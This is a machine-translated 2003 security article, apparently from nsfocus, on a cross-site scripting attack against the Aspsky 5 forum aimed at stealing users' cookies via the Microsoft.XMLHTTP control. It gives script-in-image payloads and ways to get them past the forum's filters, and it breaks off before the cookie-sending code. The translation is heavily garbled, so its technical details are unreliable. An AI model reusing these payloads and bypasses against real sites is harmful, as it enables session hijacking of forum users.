Autor: czy <[email protected]>
Fuente: http://www.nsfocus.net
Fecha: 2003-09-03
(Tenga en cuenta que dado que el foro procesará algunos personajes en el artículo, es mejor
http://www.chinansl.com/czy/xmlhttp.txt Lea el artículo
http://www.chinansl.com/czy/aspsky5.htm Código de prueba)
Creo que ya estás familiarizado con los ataques de secuencias de comandos de sitios cruzados, pero siempre hay uno cuando obtienes galletas.
Pregunta: Siempre use ventana.
Es un gran descuento. Solía pensar en un método InsertAdJacenthTML para inyectar la instrucción HTML en una página web
El método apenas se puede usar para enviar cookies sin una ventana IE, pero en uso real, es decir, pueden ocurrir errores.
¿No hay mejor manera? En el pasado, al estudiar la actualización automática de los virus VBS, utilicé un microsoft.xmlhttp.
Control (este control es algo que viene con el valor predeterminado en win98/2k, y es el control, es decir, piensa seguro!), A través de él, nosotros
Puede enviar solicitudes HTTP al sitio web en la página web, ya sea publicar o obtener.
Ok, la idea ha llegado aquí. Tomemos Aspsky5.00320 como ejemplo.
Sabemos que <imgsrc = "xxxxxx"> se puede escribir en src con vBscript:. . Por ejemplo
<imgsrc = "vBscript: a = (msgbox (ahora))">, pero solo podemos ejecutar una declaración, por ejemplo
<imgsrc = "vBscript: a = (msgbox (ahora)): b = (msgbox (ahora))"> ¡Esto estará mal!
¿Qué tengo que hacer? En VBS podemos usar declaraciones de ejecución, ¡en JS podemos usar Eval!
Por ejemplo: <imgsrc = "vBscript: ejecute (" a = (msgbox (ahora)): b = (msgbox ("czy" "))">>
O <imgsrc = "javaScript: eval ('alert (/' nsfocus/'); alert (/' czy/')')">
Todavía no mareado, ¿verdad? Como se indica anteriormente, puede notar que al usar la instrucción Ejecutiva de VBS, las cotizaciones dobles deben cambiarse a "Esto se debe a que:
En VBS, las citas individuales deben estar encerradas con cadenas, ¡dos citas individuales representan una y otra cita, y dentro de citas dobles!
Entonces, en la declaración de ejecución, no podemos usar cotizaciones individuales, sino usar directamente ", cuando HTML se coincide con la cotización
Coincidirá con las citas después de src = ", por lo que solo podemos usar" en su lugar.
El problema de la marca de la cita se ha resuelto. En aplicaciones reales, Aspsky también procesará nuestro código:
1: Si encuentra una cadena de script, agregará un espacio antes.
2: Si encuentra la cadena HTTP, se considerará una URL y agregará <a> elementos en ambos lados
3: Si encuentra espacios, los usará en su lugar
Resolver el problema:
1: VBScript se reemplaza por VBScript
2: Use "" ht "" + "" TP ... en su lugar (hay más de un par de aplicaciones en citas y comillas en VBS, + representa el conector)
3: use espacio en su lugar (tenga en cuenta que no)
Al final, es el problema de enviar cookies:
1: El control puede obtener o publicar cualquier sitio web localmente, pero solo se puede usar en la página web.
Obtenga, publique servidor actual. . . . De lo contrario, ¡es decir, diría que se negaría a cuestionar!
2: Las cookies no pueden tener personajes con interacciones especiales en la URL
Resolver el problema: